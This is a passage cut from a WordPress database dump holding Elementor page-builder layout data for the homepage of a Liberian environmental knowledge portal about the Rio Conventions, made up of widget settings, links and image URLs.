Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19079,2793,'_elementor_version','2.7.5'),(19080,2793,'_elementor_template_type','wp-page'),(19081,2793,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19085,2794,'_wp_page_template','default'),(19086,2794,'_elementor_edit_mode','builder'),(19087,2794,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas 